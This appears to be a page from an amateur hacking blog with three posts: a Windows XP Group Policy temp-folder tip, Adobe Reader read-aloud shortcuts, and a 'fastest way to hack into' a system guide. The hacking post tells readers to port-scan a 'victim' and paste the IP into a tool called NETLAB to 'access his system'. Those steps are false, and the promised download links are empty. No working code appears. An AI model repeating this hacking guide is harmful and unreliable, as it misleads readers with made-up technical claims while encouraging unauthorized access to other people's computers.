    Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
    Then right click "Do Not Delete Temp Folder Upon Exit"
    Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.


    make ur pdf files to speak

    make ur pdf files to speak
    here r the shortcuts for hearing pdf files in abobe reader 6.0 or higher

    ctrl+shift+b ---->to hear the whole topic
    ctrl+shift+v ---->to hear the page

    PLEASE GIVE ME REPLIES SO THAT I CAN ADD MORE STUFF LIKE THIS

    FASTEST WAY TO HACK INTO **** SYSTEMT

    you can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking.

    steps: - 1.Download software PORT SCANNER

    To download copy and paste the below code in the address bar




    2.Copy the ip address of the victim whose port is open.
    3.Download NETLAB which gives u all information includes victim ip address,Area from where he is accessing internet....
    4.Paste the ip of victim u found initially into NETLAB .Thats it u access his system.

    To download copy and paste the below code in the address bar




    PLEASE GIVE ME REPLIES SO THAT I CAN ADD MORE STUFF LIKE THIS

    powered by hackingstore | WordPress by Newwpthemes | Converted by BloggerTheme